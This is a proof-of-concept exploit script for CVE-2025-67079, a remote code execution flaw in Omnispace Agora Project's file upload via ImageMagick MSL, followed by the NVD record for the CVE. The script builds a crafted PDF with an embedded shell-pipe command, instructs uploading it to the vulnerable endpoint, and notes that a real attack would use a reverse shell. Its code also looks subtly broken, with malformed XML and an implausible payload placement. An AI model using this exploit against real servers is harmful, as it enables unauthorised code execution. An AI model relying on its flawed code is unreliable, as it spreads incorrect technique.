CVE-2025-67079

#!/usr/bin/env python3 # CVE-2025-67079 PoC - Omnispace Agora Project File Upload RCE via ImageMagick MSL # This PoC demonstrates the vulnerability by creating a malicious PDF with embedded MSL script import sys def generate_malicious_pdf(): """Generate a malicious PDF file containing MSL script for ImageMagick exploitation""" # MSL script that will be executed by ImageMagick msl_script = ''' <?xml version="1.0" encoding="UTF-8"?> <image> <read filename="pdf:/MSL_PAYLOAD"/> <get width="height"ura="base-width"/> <resize geometry="new-widthxnew-height"/> <write filename="/tmp/pwned.txt" /> </image> ''' # The actual command to execute (modify as needed) # This example writes to a file; in real attack, this would be a reverse shell or other malicious command command = "| touch /tmp/pwned_by_cve_2025_67079" # Replace placeholder with actual command msl_payload = msl_script.replace("MSL_PAYLOAD", command) # Create malicious PDF with MSL script embedded malicious_pdf = f"""%PDF-1.4 1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj 2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj 3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj xref 0 4 0000000000 65535 f 0000000009 00000 n 0000000058 00000 n 0000000115 00000 n trailer << /Size 4 /Root 1 0 R >> startxref 196 %%EOF %MSL Injection Point - ImageMagick will process this {msl_payload} """ return malicious_pdf def main(): print("[*] CVE-2025-67079 PoC Generator") print("[*] Target: Omnispace Agora Project < 25.10") print("[*] Vulnerability: File Upload RCE via ImageMagick MSL Engine") # Generate the malicious PDF pdf_content = generate_malicious_pdf() # Save to file output_file = "exploit_cve_2025_67079.pdf" with open(output_file, 'w') as f: f.write(pdf_content) print(f"[+] Malicious PDF created: {output_file}") print("[+] Upload this file to the vulnerable file upload endpoint") print("[+] The ImageMagick MSL engine will execute embedded commands") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-67079", "sourceIdentifier": "[email protected]", "published": "2026-01-15T16:16:11.977", "lastModified": "2026-01-21T14:42:07.337", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "File upload vulnerability in Omnispace Agora Project before 25.10 allowing attackers to execute code through the MSL engine of the Imagick library via crafted PDF file to the file upload and thumbnail functions."}, {"lang": "es", "value": "Vulnerabilidad de carga de archivos en Omnispace Agora Project anterior a 25.10 permitiendo a los atacantes ejecutar código a través del motor MSL de la biblioteca Imagick mediante un archivo PDF manipulado a las funciones de carga de archivos y miniaturas."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:agora-project:agora-project:*:*:*:*:*:*:*:*", "versionEndExcluding": "25.10", "matchCriteriaId": "03FDD8D6-01A9-4C64-9893-65C744702416"}]}]}], "references": [{"url": "https://www.agora-project.net", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.helx.io/blog/advisory-agora-project/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}